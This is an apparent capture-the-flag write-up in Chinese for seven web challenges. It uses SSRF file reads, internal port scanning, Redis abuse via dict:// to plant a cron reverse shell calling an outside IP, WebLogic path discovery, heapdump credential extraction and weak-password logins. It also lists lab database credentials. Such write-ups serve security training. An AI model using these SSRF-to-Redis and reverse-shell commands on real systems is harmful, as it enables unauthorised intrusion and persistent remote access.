WEB1
flag1

根目录的话,伪协议读取文件
file:///flag

flag2
同样存在

提示数据库中,还有内网范围172.18.240.0/24
没有给到具体的ip的话

返回页面单独测一下
应该是7
端口爆破一下

6379的redis

查看键值

获取值
dict://172.18.240.7:6379/GET flag

flag3

还是6379

反弹shell
写入计划任务
dict://172.18.240.7:6379/config set dir /var/spool/cron/

dict://172.18.240.7:6379/config set dbfilename root

dict://172.18.240.7:6379/SET x "\n\n* * * * * /bin/bash -c '/bin/bash -i >%26 /dev/tcp/118.178.135.162/8888 0>%261'\n\n"

nc -lvnp 8888
dict://172.18.240.7:6379/SAVE


WEB2
flag1

7001weblogic



flag2


/uddiexplorer/oracle_logo.gif

./servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/oracle_logo.gif

. /root/Oracle/Middleware/user_projects/domains/base_domain
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/uddiexplorer/5f6ebw/war/



不能执行命令
在目录/root/Oracle/Middleware/user_projects/domains/base_domain/config/jdbc/JDBC_Data_Source-0-3407-jdbc.xml发现

WEB3
flag1




JDumpSpider-1.1-SNAPSHOT-full.jar使用(当然目录env之间也有flag1)

flag2
[password = MeetSec@2nd!2022, driverClassName = com.mysql.jdbc.Driver, url = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]


meetsec/MeetSec@2nd!2022

WEB4
cms





meetsec
2446d54c2e68d221db9cff65




WEB5

弱口令



WEB6
工具秒了

WEB7

默认密码,弱密码登录

JG/RsuIKp3DFaBfD3ctgeA==

